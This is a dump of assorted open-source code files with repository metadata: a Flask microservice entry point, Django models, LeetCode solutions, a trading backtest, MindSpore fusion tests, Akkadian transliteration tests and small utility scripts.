| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
from flask import Flask
from flask_cors import CORS

# Comments microservice entry point.
app = Flask(__name__)
CORS(app)  # allow cross-origin requests to this service

# Imported after `app` exists: the routers module registers routes against
# it as an import side effect (hence the star import placed down here).
from routers import *

if __name__ == '__main__':
    # NOTE(review): debug=True is unsafe outside local development.
    app.run(port=5001, debug=True)
|
[
"idris.sabanli@gmail.com"
] |
idris.sabanli@gmail.com
|
63f67629a5a7b16ce7fd1a19104293260e41bb86
|
1b81f2ac5e48b7d91949a6b71c4cc9f9b9f3f19c
|
/vera/params/models.py
|
83f99aecd67832508b05874797e90e7e02e8e836
|
[
"MIT"
] |
permissive
|
erick-otenyo/vera
|
b794d8caf9cb4e183ffbb5ac075122a1475d9cb1
|
bd6a7aed8bdafc8a3025aefa5d54616473f203a6
|
refs/heads/master
| 2020-08-30T07:13:18.258335
| 2017-09-14T15:44:18
| 2017-09-14T15:44:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,778
|
py
|
from django.db import models
from wq.db.patterns import models as patterns
import swapper
# All swappable models in this app share the 'WQ' setting prefix.
swapper.set_app_prefix('params', 'WQ')


# Base metadata classes (Site, ReportStatus, Parameter)
class BaseSite(patterns.IdentifiedModel):
    """Abstract monitoring site."""

    @property
    def valid_events(self):
        # Events having at least one report whose status is marked valid.
        events = self.event_set.filter(
            report_set__status__is_valid=True
        ).values_list('pk', flat=True)
        # FIXME: events may be duplicated
        return self.event_set.filter(pk__in=events)

    class Meta(patterns.IdentifiedModel.Meta):
        abstract = True


class BaseReportStatus(patterns.IdentifiedModel):
    """Abstract report status; is_valid marks statuses that count as accepted."""
    is_valid = models.BooleanField(default=False)

    class Meta(patterns.IdentifiedModel.Meta):
        abstract = True


class BaseParameter(patterns.IdentifiedModel):
    """Abstract measured parameter, optionally numeric with units."""
    is_numeric = models.BooleanField(default=False)
    units = models.CharField(max_length=50, null=True, blank=True)
    # Mustache-style label template: units are appended in parentheses
    # only when present.
    wq_label_template = "{{name}}{{#units}} ({{units}}){{/units}}"

    class Meta(patterns.IdentifiedModel.Meta):
        abstract = True
# Default implementation of the above classes, can be swapped
class Site(BaseSite):
    """Default Site with plain latitude/longitude coordinates."""
    latitude = models.FloatField(null=True, blank=True)
    longitude = models.FloatField(null=True, blank=True)

    class Meta(BaseSite.Meta):
        db_table = 'wq_site'
        swappable = swapper.swappable_setting('params', 'Site')


class ReportStatus(BaseReportStatus):
    """Default ReportStatus implementation."""
    class Meta(BaseReportStatus.Meta):
        verbose_name_plural = 'report statuses'
        db_table = 'wq_reportstatus'
        swappable = swapper.swappable_setting('params', 'ReportStatus')


class Parameter(BaseParameter):
    """Default Parameter implementation."""
    class Meta(BaseParameter.Meta):
        db_table = 'wq_parameter'
        swappable = swapper.swappable_setting('params', 'Parameter')
|
[
"andrew@wq.io"
] |
andrew@wq.io
|
d466f5bbc2de930da13d832fc7fac286b4311dea
|
d8fe3b5243bec2b61fd7907c4ff799b24bb617e5
|
/LeetCode/MajorityElement.py
|
f1235e14e87b3df2f12c928bee4c7e9c41e4d3f2
|
[
"Unlicense"
] |
permissive
|
SelvorWhim/competitive
|
b89ed252512d88d9346d168dc6b48e0a42a6142d
|
1c73a5c7b2d0dc1b6c4f3f06ace69cdf5c6a34c0
|
refs/heads/master
| 2023-04-13T01:02:52.083519
| 2023-04-11T10:14:38
| 2023-04-11T10:14:38
| 96,573,533
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
from collections import Counter
class Solution:
    # Counter-based approach: correct whenever a true majority element
    # exists (easy to verify one if needed). O(n) time; space between O(1)
    # and O(k) depending on most_common's implementation, for k unique
    # elements.
    def majorityElement(self, nums):
        """
        :type nums: List[int]
        :rtype: int
        """
        counts = Counter(nums)
        (value, _frequency), = counts.most_common(1)
        return value
|
[
"Carmeverre@gmail.com"
] |
Carmeverre@gmail.com
|
6c5868e7dbe4f882d68893fb9771b13e4d45611d
|
c91f2ebbc7d808fea953249cb8baec35addb0c63
|
/AlgoTrading/examples/WindBasedStrategy.py
|
26e98b38c0ac13455fee9a1e8cd49ee9121c264f
|
[] |
no_license
|
wellengo/AlgoTrading
|
8644dc687ae1524f3b9778624b6fab6299d6336f
|
1d5925580f9fc4b9065df275f79873071742c61a
|
refs/heads/master
| 2021-12-13T22:18:07.413556
| 2017-04-13T04:33:12
| 2017-04-13T04:33:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,757
|
py
|
# -*- coding: utf-8 -*-
u"""
Created on 2015-9-23
@author: cheng.li
"""
import datetime as dt
from AlgoTrading.api import Strategy
from AlgoTrading.api import strategyRunner
from AlgoTrading.api import DataSource
from AlgoTrading.api import set_universe
from PyFin.api import MA
from PyFin.api import MAX
from PyFin.api import MIN
class MovingAverageCrossStrategy(Strategy):
    """Long/flat strategy driven by the MA(10) - MA(120) crossover."""

    def __init__(self):
        # Filter on the 10-day high/low ratio. NOTE(review): max/min over
        # the same window makes the ratio >= 1 by construction, so a
        # ">= 1.00" threshold looks like it passes everything — confirm
        # the intended cutoff.
        filtering = (MAX(10, 'close') / MIN(10, 'close')) >= 1.00
        indicator = MA(10, 'close') - MA(120, 'close')
        self.signal = indicator[filtering]

    def handle_data(self):
        for s in self.universe:
            # NOTE(review): 'avaliable' is a typo in the framework API name;
            # must match the framework, cannot be fixed here.
            amount = self.avaliableForSale(s)
            if self.signal[s] > 0. and self.secPos[s] == 0:
                self.order(s, 1, quantity=200)   # open a 200-share position
            if self.signal[s] < 0. and amount != 0:
                self.order(s, -1, quantity=200)  # sell 200 shares
def run_example():
    """Backtest the strategy on the first 200 constituents of index
    '000300.zicn' (presumably the CSI 300 — confirm), 2015 through 2016."""
    universe = set_universe('000300.zicn', refDate='2015-01-01')[:200]
    startDate = dt.datetime(2015, 1, 1)
    endDate = dt.datetime(2017, 1, 1)
    strategyRunner(userStrategy=MovingAverageCrossStrategy,
                   symbolList=universe,
                   startDate=startDate,
                   endDate=endDate,
                   benchmark='000300.zicn',
                   logLevel='info',
                   saveFile=True,
                   plot=True,
                   freq='D')  # daily bars
if __name__ == "__main__":
    # NOTE(review): the VisualPortfolio Settings name is immediately
    # shadowed by the AlgoTrading import on the next line — confirm whether
    # the first import is needed for its side effects.
    from VisualPortfolio.Env import Settings
    from AlgoTrading.Env import Settings
    Settings.set_source(DataSource.WIND)

    # Time the backtest run.
    startTime = dt.datetime.now()
    print("Start: %s" % startTime)
    run_example()
    endTime = dt.datetime.now()
    print("End : %s" % endTime)
    print("Elapsed: %s" % (endTime - startTime))
|
[
"siqiao_xue@163.com"
] |
siqiao_xue@163.com
|
69b3a8a5656a6229d00db9a433b364d43faecb76
|
266947fd84eed629ed0c21f6d91134239512afd9
|
/BeginnerContest_B/070.py
|
44ab7e3e3b48dab05d40236c4d90574db6a44ef3
|
[] |
no_license
|
SkiMsyk/AtCoder
|
c86adeec4fa470ec14c1be7400c9fc8b3fb301cd
|
8102b99cf0fb6d7fa304edb942d21cf7016cba7d
|
refs/heads/master
| 2022-09-03T01:23:10.748038
| 2022-08-15T01:19:55
| 2022-08-15T01:19:55
| 239,656,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
# input
A, B, C, D = map(int, input().split())

# processing
# 0 -- A -- B ---...
# 0 ---- C ---- D ---...
# Length of the overlap of intervals [A, B] and [C, D]: it starts at
# max(A, C) and ends at min(B, D); clamp to 0 when they do not intersect.
res = max(min(B, D) - max(A, C), 0)

# output
print(res)
|
[
"sakaimasayuki@sakaimasayukinoMacBook-puro.local"
] |
sakaimasayuki@sakaimasayukinoMacBook-puro.local
|
f06cc6f2c9d30f0a1597c6703f19934298fd36c3
|
9e31cabea36b122be02fa778264a5c9a313a7a3c
|
/chapter_17/p17_4.py
|
01f1d2cde0b036ebaedf4b1335f016b631309473
|
[] |
no_license
|
anywhere1234/CTCI_python
|
b1c27997fe20d17f48b423e647fed600811ab015
|
6c7e71f4829708da397867dd9b2cec61a654d3f9
|
refs/heads/master
| 2023-02-09T14:02:29.710006
| 2021-01-06T00:04:58
| 2021-01-06T00:04:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,564
|
py
|
from typing import List
def get_bit(a: int, bit_nr: int) -> int:
    """Return bit number *bit_nr* of *a* (0-indexed from the LSB)."""
    return (a >> bit_nr) & 0b1
def find_mssing(arr: List[int], n: int) -> int:
    """Return the single number from 0..n that is absent from *arr*."""
    # NOTE(review): the name is presumably a typo of find_missing; it is
    # kept because the __main__ block below calls it by this spelling.
    return find_missing_helper(arr, list(range(len(arr))), 0, n)
def find_missing_helper(arr: List[int],
list_indexes: List[int],
bit_offset: int,
n: int) -> int:
if n == 0:
return 0
odds = []
evens = []
for i in list_indexes:
bit_now = get_bit(arr[i], bit_offset)
if bit_now:
odds.append(i)
else:
evens.append(i)
expected_odds = 0
expected_evens = 0
for i in range(n+1):
if i & 0b1:
expected_odds += 1
else:
expected_evens += 1
if len(evens) < expected_evens:
bit_now = 0
rest = find_missing_helper(arr, evens, bit_offset+1, n >> 1)
else:
bit_now = 1
rest = find_missing_helper(arr, odds, bit_offset+1, n >> 1)
# print(f"Bit now is {bit_now}, rest {rest},"
# f" evens: {evens} (expected {expected_evens}),"
# f" odds: {odds} (expected {expected_odds})")
return (rest << 1) | bit_now
# 11 # 1
# --- ->
# 10 # 0
# 01
# 00
if __name__ == "__main__":
exs = [
([0, 1, 2], 3),
([1, 2, 3, 4, 5, 6, 7, 8], 8),
([0, 1, 2, 3, 5], 5),
([1, 2, 3, 4, 5, 6, 7, 8, 0], 9)
]
for arr, n in exs:
print(f"In arr {arr}, with limit {n}, missing is {find_mssing(arr,n)}")
|
[
"bogdan.stoicescu95@gmail.com"
] |
bogdan.stoicescu95@gmail.com
|
db0a75c33b2d39ccd10641bc74430fa734206139
|
d305e9667f18127e4a1d4d65e5370cf60df30102
|
/tests/ut/cpp/python_input/gtest_input/pre_activate/fused_batch_norm_fusion_test.py
|
472e7a5d4be4cf0dc07a5047f721afdf0469bf6f
|
[
"Apache-2.0",
"MIT",
"Libpng",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"AGPL-3.0-only",
"MPL-2.0-no-copyleft-exception",
"IJG",
"Zlib",
"MPL-1.1",
"BSD-3-Clause",
"BSD-3-Clause-Open-MPI",
"MPL-1.0",
"GPL-2.0-only",
"MPL-2.0",
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
imyzx2017/mindspore_pcl
|
d8e5bd1f80458538d07ef0a8fc447b552bd87420
|
f548c9dae106879d1a83377dd06b10d96427fd2d
|
refs/heads/master
| 2023-01-13T22:28:42.064535
| 2020-11-18T11:15:41
| 2020-11-18T11:15:41
| 313,906,414
| 6
| 1
|
Apache-2.0
| 2020-11-18T11:25:08
| 2020-11-18T10:57:26
| null |
UTF-8
|
Python
| false
| false
| 4,398
|
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import mindspore.common.dtype as mstype
from mindspore.common.tensor import Tensor
from mindspore.ops import Primitive
from mindspore.ops import operations as P
from mindspore.ops import functional as F
AssignSub = P.AssignSub()
Mul = P.Mul()
Sub = P.Sub()
make_tuple = Primitive('make_tuple')
tuple_getitem = Primitive('tuple_getitem')
BatchNorm = P.BatchNorm()
Cast = P.Cast()
BNTrainingReduce = Primitive('BNTrainingReduce')
BNTrainingUpdate = Primitive('BNTrainingUpdate')
constant0 = Tensor(0.1, mstype.float32)
constant1 = Tensor(0.1, mstype.float32)
class FnDict:
def __init__(self):
self.fnDict = {}
def __call__(self, fn):
self.fnDict[fn.__name__] = fn
def __getitem__(self, name):
return self.fnDict[name]
def test_fused_batch_norm_fusion(tag):
fns = FnDict()
@fns
def before(input0, input1, input2, input3, input4, var0, var1):
batch_norm = BatchNorm(input0, input1, input2, input3, input4)
sub0 = Sub(var0, tuple_getitem(batch_norm, 1))
sub1 = Sub(var1, tuple_getitem(batch_norm, 2))
mul0 = Mul(sub0, constant0)
mul1 = Mul(sub1, constant1)
assign_sub0 = AssignSub(var0, mul0)
assign_sub1 = AssignSub(var1, mul1)
depend0 = F.depend(tuple_getitem(batch_norm, 0), assign_sub0)
depend1 = F.depend(depend0, assign_sub1)
outputs = make_tuple(depend1, tuple_getitem(batch_norm, 3), tuple_getitem(batch_norm, 4))
output = tuple_getitem(outputs, 0)
return output
@fns
def before_mix_precision0(input0, input1, input2, input3, input4, var0, var1):
batch_norm = BatchNorm(input0, input1, input2, input3, input4)
sub0 = Sub(Cast(var0, mstype.float32), tuple_getitem(batch_norm, 1))
sub1 = Sub(Cast(var1, mstype.float32), tuple_getitem(batch_norm, 2))
mul0 = Mul(sub0, constant0)
mul1 = Mul(sub1, constant1)
assign_sub0 = AssignSub(var0, Cast(mul0, mstype.float32))
assign_sub1 = AssignSub(var1, Cast(mul1, mstype.float32))
depend0 = F.depend(tuple_getitem(batch_norm, 0), assign_sub0)
depend1 = F.depend(depend0, assign_sub1)
outputs = make_tuple(depend1, tuple_getitem(batch_norm, 3), tuple_getitem(batch_norm, 4))
output = tuple_getitem(outputs, 0)
return output
@fns
def before_mix_precision1(input0, input1, input2, input3, input4, var0, var1):
batch_norm = BatchNorm(input0, input1, input2, input3, input4)
sub0 = Sub(Cast(var0, mstype.float32), tuple_getitem(batch_norm, 1))
sub1 = Sub(Cast(var1, mstype.float32), tuple_getitem(batch_norm, 2))
mul0 = Mul(Cast(sub0, mstype.float32), constant0)
mul1 = Mul(Cast(sub1, mstype.float32), constant1)
assign_sub0 = AssignSub(var0, mul0)
assign_sub1 = AssignSub(var1, mul1)
depend0 = F.depend(tuple_getitem(batch_norm, 0), assign_sub0)
depend1 = F.depend(depend0, assign_sub1)
outputs = make_tuple(depend1, tuple_getitem(batch_norm, 3), tuple_getitem(batch_norm, 4))
output = tuple_getitem(outputs, 0)
return output
@fns
def after(input0, input1, input2, input3, input4, var0, var1):
bn_training_reduce = BNTrainingReduce(input0)
bn_training_update = BNTrainingUpdate(input0, tuple_getitem(bn_training_reduce, 0),
tuple_getitem(bn_training_reduce, 1), input1, input2, var0, var1)
outputs = make_tuple(tuple_getitem(bn_training_update, 0), tuple_getitem(bn_training_update, 3),
tuple_getitem(bn_training_update, 4))
output = tuple_getitem(outputs, 0)
return make_tuple(output)
return fns[tag]
|
[
"513344092@qq.com"
] |
513344092@qq.com
|
156a74067eb5fcfb827403fb746855c07b61a2b1
|
6cd690fb01e100f440289ea8fe7342bb58d37e78
|
/src/elemental/ability/abilities/rampage.py
|
5048dec0f9e2721eec09a8315b46108a732a6b0c
|
[] |
no_license
|
Hammerlord/Monbot
|
6db8308ae492d7cfbb6f1bdff909105129924269
|
fde8177d9170dddd958a89068a560008259d6e24
|
refs/heads/master
| 2020-03-07T16:43:20.019123
| 2019-08-29T03:08:33
| 2019-08-29T03:08:33
| 127,591,188
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 693
|
py
|
from src.core.elements import Elements, Category
from src.elemental.ability.ability import Ability
class Rampage(Ability):
def __init__(self):
super().__init__()
self.name = 'Rampage'
self._description = ("Strike the opponent in a fury over the next 3 turns. "
"During this time, no other action can be taken.")
self.element = Elements.EARTH
self.mana_cost = 8
self.attack_power = 12
self.category = Category.PHYSICAL
@property
def base_channel_time(self) -> int:
return 3
def get_recap(self, elemental_name: str) -> str:
return f"{elemental_name} has entered a rampage!"
|
[
"nepharus@gmail.com"
] |
nepharus@gmail.com
|
169a1fd5a957f93eb770569acd3dbba2aa737d62
|
2411e39691f02bec1cd03958a0bd5c2c850db457
|
/py/applets/teapot.py
|
43d30204e469053006ae47273dbd721402594e44
|
[] |
no_license
|
wielandgmeiner/javacard_playground
|
d9c2067901e3005b69cd69b17774f00f19a04c6e
|
758fb14418f6aa0079da794efa67384db512fafd
|
refs/heads/master
| 2022-09-21T15:32:28.194817
| 2020-05-31T19:16:54
| 2020-05-31T19:16:54
| 259,915,974
| 0
| 0
| null | 2020-04-29T12:13:25
| 2020-04-29T12:13:24
| null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
from .core import AppletBase
class Teapot(AppletBase):
def __init__(self, connection=None):
super().__init__("B00B5111CA01", connection)
def get_data(self):
return self.request("B0A10000")
def put_data(self, d):
data = bytes([len(d)])+d.encode()
return self.request("B0A20000"+data.hex())
|
[
"snigirev.stepan@gmail.com"
] |
snigirev.stepan@gmail.com
|
c4eabefbb636b88c245f4eeddf235b3bf569d694
|
e6e57bf7d4eda37f1188ab72ff249675f40029ee
|
/algorithms_and_data_structures/arrays/Valid Sudoku.py
|
cd5a560608706499dcf3eb78cabfb8e53630207a
|
[] |
no_license
|
juanpedrovel/bomboclap
|
4e186331ef1c26c8522e44c21d6a33358471786b
|
99db02266c31dd14357ef6a575d35fcf55718617
|
refs/heads/master
| 2020-04-19T21:16:38.141830
| 2019-01-31T00:31:24
| 2019-01-31T00:31:24
| 168,436,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,638
|
py
|
class Solution:
def isValidSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: bool
"""
def bx_numb(i, j):
box_number = 0
if j > 5:
box_number += 2
elif j > 2:
box_number += 1
if i > 5:
box_number += 6
elif i > 2:
box_number += 3
return box_number
column = []
row = []
box = []
for i in range(9):
column.append({})
row.append({})
box.append({})
for i in range(9):
for j in range(9):
cell = board[i][j]
if cell == '.':
continue
else:
box_number = bx_numb(i, j)
if cell not in column[i] and cell not in row[j] and cell not in box[box_number]:
column[i][cell] = 1
row[j][cell] = 1
box[box_number][cell] = 1
else:
return False
return True
s = [
["5","3",".",".","7",".",".",".","."],
["6",".",".","1","9","5",".",".","."],
[".","9","8",".",".",".",".","6","."],
["8",".",".",".","6",".",".",".","3"],
["4",".",".","8",".","3",".",".","1"],
["7",".",".",".","2",".",".",".","6"],
[".","6",".",".",".",".","2","8","."],
[".",".",".","4","1","9",".",".","5"],
[".",".",".",".","8",".",".","7","9"]
]
dict = [2,2]
d = Solution()
print(d.isValidSudoku(s))
|
[
"juanpedrovel@gmail.com"
] |
juanpedrovel@gmail.com
|
b22195cecdaf5c8cf512f825dadae2c5286b19a2
|
2c97e11e13bfbabfdae8979385ba0957c7b11270
|
/ebl/tests/transliteration/test_normalized_akkadian.py
|
647d2b00a0572b7f4c97be63209b86160d835bb1
|
[
"MIT"
] |
permissive
|
ElectronicBabylonianLiterature/ebl-api
|
72a2a95291e502ec89a20ebe5c14447e63ac6d92
|
4910f6fbb57fa213fef55cbe9bc16215aebbaa27
|
refs/heads/master
| 2023-08-16T12:42:03.303042
| 2023-08-16T10:59:44
| 2023-08-16T10:59:44
| 135,266,736
| 11
| 3
|
MIT
| 2023-09-12T09:56:14
| 2018-05-29T08:39:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,532
|
py
|
import pytest
from ebl.dictionary.domain.word import WordId
from ebl.lemmatization.domain.lemmatization import LemmatizationToken
from ebl.tests.asserts import assert_token_serialization
from ebl.transliteration.application.token_schemas import OneOfTokenSchema
from ebl.transliteration.domain.atf import Flag
from ebl.transliteration.domain.enclosure_tokens import (
BrokenAway,
Emendation,
PerhapsBrokenAway,
)
from ebl.transliteration.domain.normalized_akkadian import (
AkkadianWord,
Caesura,
MetricalFootSeparator,
)
from ebl.transliteration.domain.tokens import Joiner, UnknownNumberOfSigns, ValueToken
@pytest.mark.parametrize(
"word,expected,lemmatizable",
[
(AkkadianWord.of((ValueToken.of("ibnû"),)), "ibnû", True),
(
AkkadianWord.of(
(ValueToken.of("ibnû"),), (Flag.UNCERTAIN, Flag.DAMAGE, Flag.CORRECTION)
),
"ibnû?#!",
True,
),
(AkkadianWord.of((BrokenAway.open(), ValueToken.of("ibnû"))), "[ibnû", True),
(
AkkadianWord.of(
(
BrokenAway.open(),
PerhapsBrokenAway.open(),
ValueToken.of("ib"),
PerhapsBrokenAway.close(),
ValueToken.of("nû"),
BrokenAway.close(),
)
),
"[(ib)nû]",
True,
),
(
AkkadianWord.of(
(
BrokenAway.open(),
PerhapsBrokenAway.open(),
Emendation.open(),
ValueToken.of("ib"),
PerhapsBrokenAway.close(),
ValueToken.of("nû"),
Emendation.close(),
BrokenAway.close(),
)
),
"[(<ib)nû>]",
True,
),
(
AkkadianWord.of(
(ValueToken.of("ibnû"), PerhapsBrokenAway.close(), BrokenAway.close()),
(Flag.UNCERTAIN,),
),
"ibnû?)]",
True,
),
(
AkkadianWord.of(
(ValueToken.of("ib"), UnknownNumberOfSigns.of(), ValueToken.of("nû"))
),
"ib...nû",
False,
),
(
AkkadianWord.of(
(ValueToken.of("ib"), Joiner.hyphen(), ValueToken.of("nû"))
),
"ib-nû",
True,
),
],
)
def test_akkadian_word(word: AkkadianWord, expected: str, lemmatizable: bool) -> None:
assert word.value == expected
assert word.clean_value == expected.translate(str.maketrans("", "", "[]()<>#?!"))
assert word.lemmatizable is lemmatizable
assert word.alignable is lemmatizable
serialized = {
"type": "AkkadianWord",
"parts": OneOfTokenSchema().dump(word.parts, many=True),
"modifiers": [modifier.value for modifier in word.modifiers],
"uniqueLemma": [],
"alignment": None,
"variant": None,
"lemmatizable": lemmatizable,
"alignable": lemmatizable,
"normalized": True,
"language": "AKKADIAN",
"hasVariantAlignment": word.has_variant_alignment,
"hasOmittedAlignment": word.has_omitted_alignment,
}
assert_token_serialization(word, serialized)
def test_akkadian_word_invalid_modifier() -> None:
with pytest.raises(ValueError): # pyre-ignore[16]
AkkadianWord.of((ValueToken.of("ibnû"),), (Flag.COLLATION,))
def test_set_unique_lemma() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),))
lemma = LemmatizationToken("bu", (WordId("nu I"),))
expected = AkkadianWord.of((ValueToken.of("bu"),), unique_lemma=(WordId("nu I"),))
assert word.set_unique_lemma(lemma) == expected
def test_set_unique_lemma_empty() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),), unique_lemma=(WordId("nu I"),))
lemma = LemmatizationToken("bu", tuple())
expected = AkkadianWord.of((ValueToken.of("bu"),))
assert word.set_unique_lemma(lemma) == expected
def test_set_alignment() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),))
expected = AkkadianWord.of((ValueToken.of("bu"),), alignment=1)
assert word.set_alignment(1, None) == expected
def test_set_alignment_empty() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),), alignment=1)
expected = AkkadianWord.of((ValueToken.of("bu"),))
assert word.set_alignment(None, None) == expected
@pytest.mark.parametrize(
"caesura,is_uncertain,value",
[(Caesura.certain(), False, "||"), (Caesura.uncertain(), True, "(||)")],
)
def test_caesura(caesura: Caesura, is_uncertain: bool, value: str) -> None:
assert caesura.value == value
assert caesura.is_uncertain == is_uncertain
serialized = {"type": "Caesura", "isUncertain": is_uncertain}
assert_token_serialization(caesura, serialized)
@pytest.mark.parametrize(
"separator,is_uncertain,value",
[
(MetricalFootSeparator.certain(), False, "|"),
(MetricalFootSeparator.uncertain(), True, "(|)"),
],
)
def test_metrical_foot_separator(
separator: MetricalFootSeparator, is_uncertain: bool, value: str
) -> None:
assert separator.value == value
assert separator.is_uncertain == is_uncertain
serialized = {"type": "MetricalFootSeparator", "isUncertain": is_uncertain}
assert_token_serialization(separator, serialized)
|
[
"noreply@github.com"
] |
ElectronicBabylonianLiterature.noreply@github.com
|
ab8f7035259fa98d9b0d12e248edfddb9335aab6
|
407ae3372e98442698332394a3da95f8f4c488a6
|
/results/mcmc_100chains/chains_fidsig_fidcov_nonuni_landyszalay/prep_corrmatrixDATAPARAMS/combine_dddr_78.py
|
1c845494911885a0a55f330c93ae926b4511b1ec
|
[] |
no_license
|
aszewciw/MW_Structure
|
0ce437627f4c43f776eae658aad8b98a280d6b06
|
ba25761aa9444ca5c04e3a4ad617b29d586ba4c8
|
refs/heads/master
| 2021-01-12T11:59:15.717154
| 2017-12-07T00:21:54
| 2017-12-07T00:21:54
| 68,852,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,417
|
py
|
'''
Produce files containing the indices of binned pairs. Here we do this for a
uniform sample.
'''
import mw_utilities_python as mwu
import sys, pickle, os
import numpy as np
def main():
Nmocks = 1000
star_factor = 10
dd_dir = '../../prep_fid_errors_DATAPARAMS/data/'
dr_dir = './data/'
out_dir = './data/'
# get directories of scripts, executables, and star files
cleaned_dir = mwu.get_path.get_cleandata_path()
scripts_dir = mwu.get_path.get_scripts_path()
if not os.path.isdir(out_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(out_dir))
sys.exit(1)
if not os.path.isdir(dr_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(dr_dir))
sys.exit(1)
if not os.path.isdir(dd_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(dd_dir))
sys.exit(1)
# Load todo list
input_filename = cleaned_dir + 'todo_list.dat'
sys.stderr.write('Loading from file {} ...\n'.format(input_filename))
input_file = open(input_filename, 'rb')
todo_list = pickle.load(input_file)
input_file.close()
# Write command file
for i in range(Nmocks):
if i <700: continue
if i>799: continue
sys.stderr.write('On sample {}/{}\n'.format(i,Nmocks))
DD_dir = dd_dir + 'sample_' + str(i) + '/'
DR_dir = dr_dir + 'sample_' + str(i) + '/'
OUT_dir = out_dir + 'sample_' + str(i) + '/'
if not os.path.isdir(DD_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(DD_dir))
sys.exit(1)
if not os.path.isdir(DR_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(DR_dir))
sys.exit(1)
if not os.path.isdir(OUT_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(OUT_dir))
sys.exit(1)
for p in todo_list:
N_rand = int(p.N_star * star_factor)
dr_file = DR_dir + 'dr_' + p.ID + '.dat'
dd_file = DD_dir + 'dd_' + p.ID + '.dat'
out_file = OUT_dir + 'DDm2DR_' + p.ID + '.dat'
dr = np.genfromtxt(dr_file, unpack=True, usecols=[4])
dd = np.genfromtxt(dd_file, unpack=True, usecols=[4])
ddm2dr = dd - 2.0*dr
np.savetxt(out_file, ddm2dr, fmt='%.6e')
if __name__ == '__main__':
main()
|
[
"aszewci@gmail.com"
] |
aszewci@gmail.com
|
03b93222dc4c00950cafabceaa0b78a0966de0bf
|
5c8139f1e57e06c7eaf603bd8fe74d9f22620513
|
/PartB/py图像的渲染.py
|
d38a444d1e9b9dacfe956cabdc89c130cf467422
|
[] |
no_license
|
madeibao/PythonAlgorithm
|
c8a11d298617d1abb12a72461665583c6a44f9d2
|
b4c8a75e724a674812b8a38c0202485776445d89
|
refs/heads/master
| 2023-04-03T07:18:49.842063
| 2021-04-11T12:02:40
| 2021-04-11T12:02:40
| 325,269,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,144
|
py
|
# 图片的渲染。
有一幅以二维整数数组表示的图画,每一个整数表示该图画的像素值大小,数值在 0 到 65535 之间。
给你一个坐标 (sr, sc) 表示图像渲染开始的像素值(行 ,列)和一个新的颜色值 newColor,让你重新上色这幅图像。
为了完成上色工作,从初始坐标开始,记录初始坐标的上下左右四个方向上像素值与初始坐标相同的相连像素点,接着再记录这四个方向上符合条件的像素点与他们对应四个方向上像素值与初始坐标相同的相连像素点,……,重复该过程。将所有有记录的像素点的颜色值改为新的颜色值。
最后返回经过上色渲染后的图像。
示例 1:
输入:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
输出: [[2,2,2],[2,2,0],[2,0,1]]
解析:
在图像的正中间,(坐标(sr,sc)=(1,1)),
在路径上所有符合条件的像素点的颜色都被更改成2。
注意,右下角的像素没有更改为2,
因为它不是在上下左右四个方向上与初始点相连的像素点。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/flood-fill
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
# ---------------------------------------------------------------------------------------- ----------------
from typing import List
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
color = image[sr][sc]
if color == newColor:
# 如果是没有染色的条件下,则直接的进行返回。
return image
def dfs(i, j):
if 0 > i or i >= len(image) or 0 > j or j >= len(image[0]) or image[i][j] != color:
return
image[i][j] = newColor
dfs(i+1, j)
dfs(i-1, j)
dfs(i, j+1)
dfs(i, j-1)
dfs(sr, sc)
return image
if __name__ == "__main__":
s = Solution()
list2= [[1,1,1],
[1,1,0],
[1,0,1]]
print(s.floodFill(list2))
|
[
"2901429479@qq.com"
] |
2901429479@qq.com
|
1c0672167fdd543464f6bbd6c8ac7098353c0bea
|
d1ddb9e9e75d42986eba239550364cff3d8f5203
|
/google-cloud-sdk/lib/googlecloudsdk/command_lib/billing/utils.py
|
718213de8b0203d284f7c2d410fd64d0ab94b416
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
bopopescu/searchparty
|
8ecd702af0d610a7ad3a8df9c4d448f76f46c450
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
refs/heads/master
| 2022-11-19T14:44:55.421926
| 2017-07-28T14:55:43
| 2017-07-28T14:55:43
| 282,495,798
| 0
| 0
|
Apache-2.0
